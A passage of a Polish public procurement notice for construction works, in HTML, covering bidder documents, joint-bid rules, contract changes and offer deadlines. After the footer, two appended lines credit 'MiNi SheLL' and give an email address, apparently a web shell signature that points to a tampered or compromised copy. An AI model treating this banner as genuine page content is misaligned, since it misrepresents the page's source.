oświadczeniem, o którym mowa wyżej, także oświadczenie<br/>podmiotuudostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu<br/>oraz odpowiednio spełniania warunków udziału w postępowaniu, w zakresie, w jakim<br/>Wykonawca powołuje się na jego zasoby (zgodnie z załącznikiem nr 3 do SWZ).2.<br/>Pełnomocnictwo ustanowione do reprezentowania Wykonawcy/ów ubiegającego/cych się o<br/>udzielenie zamówienia publicznego (jeśli dotyczy).Pełnomocnictwo przekazuje się w postaci<br/>elektronicznej i opatruje kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub<br/>podpisemosobistym. W przypadku, gdy pełnomocnictwo zostało wystawione w postaci<br/>papierowej i opatrzone własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego<br/>dokumentu, opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub<br/>podpisem osobistym, poświadczającym zgodność cyfrowego odwzorowania z dokumentem w<br/>postaci papierowej. Poświadczenia zgodności cyfrowego odwzorowania z pełnomocnictwem w<br/>postaci papierowej, może dokonać mocodawca (osoba/osoby wystawiające pełnomocnictwo)<br/>lub notariusz.3. Zobowiązanie podmiotu udostępniającego Wykonawcy zasoby, do oddania do<br/>dyspozycji Wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia lub inny<br/>podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów (o ile Wykonawca korzysta ze<br/>zdolnościinnych podmiotów na zasadach określonych w art. 118 ustawy).Zobowiązanie lub inny<br/>podmiotowy środek dowodowy w opisywanym zakresie, przekazuje się w postaci elektronicznej,<br/>i opatruje kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem<br/>osobistym. W przypadku, gdy zobowiązanie (inny podmiotowy środek dowodowy) zostało<br/>wystawione w postaci papierowej i opatrzone własnoręcznym podpisem, przekazuje się cyfrowe<br/>odwzorowanie tego dokumentu, opatrzone kwalifikowanym podpisem elektronicznym,<br/>podpisemzaufanym lub podpisem osobistym, poświadczającym zgodność cyfrowego<br/>odwzorowania z dokumentem w postaci papierowej. Poświadczenia zgodności cyfrowego<br/>odwzorowania z dokumentem w postaci papierowej, może dokonać podmiot udostępniający<br/>zasoby lub notariusz.4. Oświadczenie, o którym mowa w Rozdziale VI ust. 9 SWZ (Zamawiający<br/>dopuszcza złożenie tego oświadczenia na Formularzu ofertowym), z którego wynika, które<br/>roboty budowlane wykonają poszczególni wykonawcy – dotyczy tylko wykonawców wspólnie ubiegających się o udzielenie zamówienia <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.2. Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia, ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego – nie dotyczy spółki cywilnej, o ile<br/>upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do<br/>oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.3. Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia, zobowiązani się złożyć wraz z ofertą<br/>stosownepełnomocnictwo – nie dotyczy spółki cywilnej, o ile upoważnienie/ pełnomocnictwo do<br/>występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy<br/>wspólnicy podpiszą ofertę.Uwaga :Pełnomocnictwo, o którym mowa powyżej może wynikać albo<br/>z dokumentu pod taką samą nazwą, albo z umowy Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia.4. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała<br/>wszystkich Wykonawców występujących wspólnie (przez każdego z Wykonawców lub<br/>upoważnionego pełnomocnika).5. W przypadku wspólnego ubiegania się o udzielenie<br/>zamówienie przez Wykonawców oświadczenia, o których mowa w art. 125 ustawy (Rozdział XI<br/>ust. 3.1. SWZ) - składa każdy z Wykonawców wspólnie ubiegających się o<br/>zamówienie.Oświadczenia te potwierdzają spełnianie warunków udziału w postępowaniu w<br/>zakresie, w którym Wykonawca wspólnie ubiegający się o udzielenie zamówienia wykazuje<br/>spełnianie warunków udziału w postępowaniu, oraz brak podstaw wykluczenia - każdy z<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać<br/>wykluczeniu z postępowania w oparciu o wskazane w SWZ podstawy wykluczenia. Powyższe<br/>oznacza, iż:1)Oświadczenie w zakresie braku podstaw wykluczenia musi złożyć każdy z<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia.2) Oświadczenie o spełnianiu<br/>warunków udziału składa podmiot, który w odniesieniu do danego warunku udziału w<br/>postępowaniu potwierdza jego spełnianie; dopuszcza się oświadczenie złożone łącznie, tj.<br/>podpisane przezwszystkie podmioty wspólnie składające ofertę lub przez pełnomocnika<br/>występującego w imieniu wszystkich podmiotów.6. Wszelka korespondencja prowadzona będzie<br/>wyłącznie z podmiotem występującym jako pełnomocnik Wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia. 7. Warunek dotyczący uprawnień do prowadzenia określonej<br/>działalności gospodarczej lub zawodowej (o ile został sformułowany), o którym mowa wart.112<br/>ust. 2 pkt 2ustawy Pzp, zostanie spełniony, jeżeli co najmniej jeden z wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej<br/>działalności gospodarczej lub zawodowej i zrealizuje roboty budowlane, do których realizacji te<br/>uprawnienia są wymagane.8. W odniesieniu do warunków dotyczących wykształcenia,<br/>kwalifikacji zawodowych lub doświadczenia (o ile zostały sformułowane) wykonawcy wspólnie<br/>ubiegającysię o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców,<br/>którzy wykonają roboty budowlane, do realizacji których te zdolności są wymagane.9. W<br/>przypadku, o którym mowa w ust. 7 i 8 wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia, dołączają odpowiednio do oferty oświadczenie, z którego wynika, które roboty<br/>budowlane wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną<br/>wprowadzone do treści tej umowy, zawiera załącznik nr 4 do SWZ (ze względna ograniczoną<br/>ilość znaków w ogłoszeniu).1.1. Zamawiający przewiduje możliwość zmian postanowień<br/>zawartej umowy (tzw. zmiany kontraktowe w oparciu o art. 455 ust. 1 pkt 1 ustawy) w stosunku<br/>do treści oferty, na podstawie której dokonano wyboru Wykonawcy, zgodnie z warunkami<br/>zawartymi w załączniku nr 4 do SWZ.1.2. Zmiana umowy może także nastąpić w przypadkach,o<br/>których mowa w art. 455 ust. 1 pkt 2-4 oraz ust. 2 ustawy.2. Przed zawarciem umowy należy<br/>dopełnić formalności, które zostały wskazane w Rozdziale XXIII SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-17 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Platformy przetargowej https://zawiercie.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-17 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Ofertę należy sporządzić na formularzu oferty lub według<br/>takiegosamegoschematu,stanowiącego załącznik nr 1 do SWZ. Ofertę należy złożyć pod<br/>rygorem nieważności w formie elektronicznej (w postaci elektronicznej opatrzonej<br/>kwalifikowanym podpisem elektronicznym)lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym.2. Oferta wraz z załącznikami musi być złożona za<br/>pośrednictwem Platformy przetargowej. Zamawiający zaleca, aby oferta została utworzona w<br/>formacie .pdf orazpodpisana wewnętrznym podpisem elektronicznym – zgodnie z rozdz. VIII ust.<br/>2 SWZ. W przypadku zastosowania podpisu zewnętrznego należy pamiętać o obowiązku<br/>dołączenia do pliku stanowiącego ofertę także pliku podpisującego, który generuje się<br/>automatycznie podczas złożenia podpisu.3. Termin wykonania przedmiotu zamówienia: do<br/>czterech miesięcy od daty zawarcia umowy.4. Zamawiający wykluczy z postępowania<br/>Wykonawcę w przypadkach, októrych mowa w art. 108 ust. 1 pkt 1-6 ustawy (obligatoryjne<br/>przesłanki wykluczenia) .5. Z uwagi na ograniczoną ilość znaków w ogłoszeniu o zamówieniu,<br/>pozostałe informacje zostały określone w SWZ.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-02 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com